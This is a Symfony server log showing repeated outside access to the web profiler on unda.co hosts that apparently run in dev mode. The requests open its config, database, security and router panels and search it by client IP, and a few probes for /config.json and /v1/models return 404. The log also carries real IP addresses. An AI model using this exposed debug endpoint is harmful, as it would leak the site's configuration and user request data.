[2025-12-21 04:39:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 04:40:04] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3926d2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/3926d2?panel=security","method":"GET"} []
[2025-12-21 04:40:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-21 04:44:41] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"0c9887","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/0c9887/search/results?ip=85.217.140.12&limit=10","method":"GET"} []
[2025-12-21 04:44:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=85.217.140.12&limit=10","method":"GET"} []
[2025-12-21 04:45:19] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"3a51f9","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/3a51f9/search/results?limit=10&method=GET","method":"GET"} []
[2025-12-21 04:45:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
[2025-12-21 04:49:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3926d2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/3926d2?panel=request","method":"GET"} []
[2025-12-21 04:49:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-21 04:51:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2882d9","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/2882d9?panel=exception","method":"GET"} []
[2025-12-21 04:51:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-21 04:52:54] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-21 04:52:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"419b71","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/419b71?panel=request","method":"GET"} []
[2025-12-21 04:52:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-21 04:52:57] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-21 04:52:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v1/models"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v1/models\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 04:53:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v1/models" (from "https://35.175.10.94/v1/models")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v1/models\" (from \"https://35.175.10.94/v1/models\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 04:53:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v1/models" (from "https://35.175.10.94/v1/models")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v1/models\" (from \"https://35.175.10.94/v1/models\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 04:54:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/latest?ip=85.217.140.1&limit=10","method":"GET"} []
[2025-12-21 04:54:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=85.217.140.1&limit=10","method":"GET"} []
[2025-12-21 04:54:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"260090","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/260090?panel=twig","method":"GET"} []
[2025-12-21 04:54:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-21 04:55:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"86adc0","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/86adc0?panel=swiftmailer","method":"GET"} []
[2025-12-21 04:55:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
[2025-12-21 04:58:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f40bbd","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/f40bbd?panel=exception","method":"GET"} []
[2025-12-21 04:58:49] request.INFO: Matched route "_profiler_exception_css". {"route":"_profiler_exception_css","route_parameters":{"_controller":"web_profiler.controller.exception:cssAction","token":"f40bbd","_route":"_profiler_exception_css"},"request_uri":"https://auth.unda.co/_profiler/f40bbd/exception.css","method":"GET"} []
[2025-12-21 04:58:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-21 04:58:49] request.INFO: Matched route "_profiler_exception". {"route":"_profiler_exception","route_parameters":{"_controller":"web_profiler.controller.exception:showAction","token":"f40bbd","_route":"_profiler_exception"},"request_uri":"https://auth.unda.co/_profiler/f40bbd/exception","method":"GET"} []
[2025-12-21 05:01:35] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-21 05:03:26] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"0c9887","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/0c9887/search/results?ip=85.217.140.1&limit=10&url=https%3A%2F%2F35.175.10.94%2F","method":"GET"} []
[2025-12-21 05:03:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=85.217.140.1&limit=10&url=https%3A%2F%2F35.175.10.94%2F","method":"GET"} []
[2025-12-21 05:07:04] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"63017c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/63017c?panel=exception","method":"GET"} []
[2025-12-21 05:07:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-21 05:07:16] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"132e26","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/132e26/search/results?ip=78.153.140.179&limit=10&method=GET","method":"GET"} []
[2025-12-21 05:07:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=78.153.140.179&limit=10&method=GET","method":"GET"} []
[2025-12-21 05:07:37] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=36.72.159.194&limit=10&method=GET","method":"GET"} []
[2025-12-21 05:07:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=36.72.159.194&limit=10&method=GET","method":"GET"} []
[2025-12-21 05:08:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f40bbd","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/f40bbd?panel=events","method":"GET"} []
[2025-12-21 05:08:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-21 05:12:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"65f2be","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/65f2be?panel=logger","method":"GET"} []
[2025-12-21 05:12:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-21 05:12:36] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"65f2be","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/65f2be?panel=db","method":"GET"} []
[2025-12-21 05:12:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-21 05:12:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cc2d11","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/cc2d11?panel=request","method":"GET"} []
[2025-12-21 05:12:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-21 05:13:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"65f2be","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/65f2be?panel=exception","method":"GET"} []
[2025-12-21 05:13:46] request.INFO: Matched route "_profiler_exception_css". {"route":"_profiler_exception_css","route_parameters":{"_controller":"web_profiler.controller.exception:cssAction","token":"65f2be","_route":"_profiler_exception_css"},"request_uri":"https://web.unda.co/_profiler/65f2be/exception.css","method":"GET"} []
[2025-12-21 05:13:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-21 05:13:46] request.INFO: Matched route "_profiler_exception". {"route":"_profiler_exception","route_parameters":{"_controller":"web_profiler.controller.exception:showAction","token":"65f2be","_route":"_profiler_exception"},"request_uri":"https://web.unda.co/_profiler/65f2be/exception","method":"GET"} []
[2025-12-21 05:13:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"65f2be","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/65f2be?panel=events","method":"GET"} []
[2025-12-21 05:13:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-21 05:14:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"65f2be","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/65f2be?panel=router","method":"GET"} []
[2025-12-21 05:14:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-21 05:14:11] request.INFO: Matched route "_profiler_router". {"route":"_profiler_router","route_parameters":{"_controller":"web_profiler.controller.router:panelAction","token":"65f2be","_route":"_profiler_router"},"request_uri":"https://web.unda.co/_profiler/65f2be/router","method":"GET"} []
[2025-12-21 05:15:19] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"65f2be","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/65f2be?panel=security","method":"GET"} []
[2025-12-21 05:15:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-21 05:15:24] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"65f2be","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/65f2be?panel=cache","method":"GET"} []
[2025-12-21 05:15:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-21 05:15:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"65f2be","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/65f2be?group=1&panel=db","method":"GET"} []
[2025-12-21 05:15:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?group=1&panel=db","method":"GET"} []
[2025-12-21 05:16:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"65f2be","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/65f2be?panel=twig","method":"GET"} []
[2025-12-21 05:16:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-21 05:16:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"65f2be","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/65f2be?panel=dump","method":"GET"} []
[2025-12-21 05:16:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-21 05:16:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"65f2be","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/65f2be?panel=config","method":"GET"} []
[2025-12-21 05:16:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-21 05:17:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e462c1","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e462c1","method":"GET"} []
[2025-12-21 05:17:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-21 05:17:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"639e42","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/639e42?panel=events","method":"GET"} []
[2025-12-21 05:17:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-21 05:17:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"65f2be","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/65f2be?panel=time","method":"GET"} []
[2025-12-21 05:17:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-21 05:18:13] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"65f2be","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/65f2be/search/results?ip=216.73.216.212","method":"GET"} []
[2025-12-21 05:18:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=216.73.216.212","method":"GET"} []
[2025-12-21 05:18:21] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"empty","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/empty/search/results","method":"GET"} []
[2025-12-21 05:18:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-21 05:18:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"65f2be","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/65f2be?panel=request","method":"GET"} []
[2025-12-21 05:18:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-21 05:19:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"65f2be","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/65f2be?panel=form","method":"GET"} []
[2025-12-21 05:19:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-21 05:19:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3926d2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/3926d2?panel=events","method":"GET"} []
[2025-12-21 05:19:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-21 05:19:35] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/latest","method":"GET"} []
[2025-12-21 05:19:35] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-21 05:19:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"65f2be","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/65f2be?panel=swiftmailer","method":"GET"} []
[2025-12-21 05:19:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
[2025-12-21 05:19:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"65f2be","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/65f2be?panel=validator","method":"GET"} []
[2025-12-21 05:19:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-21 05:24:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"419b71","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/419b71?panel=config","method":"GET"} []
[2025-12-21 05:24:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-21 05:27:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f40bbd","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/f40bbd?panel=twig","method":"GET"} []
[2025-12-21 05:27:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-21 05:30:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"32afde","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/32afde?panel=db","method":"GET"} []
[2025-12-21 05:30:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-21 05:30:26] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"cb0b1c","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/cb0b1c/search/results?ip=66.249.75.22&limit=10&method=GET","method":"GET"} []
[2025-12-21 05:30:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=66.249.75.22&limit=10&method=GET","method":"GET"} []
[2025-12-21 05:30:34] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"e9be58","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/e9be58/search/results?limit=10&method=GET","method":"GET"} []
[2025-12-21 05:30:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
[2025-12-21 05:35:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3926d2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/3926d2?panel=router","method":"GET"} []
[2025-12-21 05:35:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-21 05:35:50] request.INFO: Matched route "_profiler_router". {"route":"_profiler_router","route_parameters":{"_controller":"web_profiler.controller.router:panelAction","token":"3926d2","_route":"_profiler_router"},"request_uri":"https://web.unda.co/_profiler/3926d2/router","method":"GET"} []
[2025-12-21 05:42:48] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"3926d2","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/3926d2/search/results?ip=85.217.140.1&limit=10&url=https%3A%2F%2F35.175.10.94%2F","method":"GET"} []
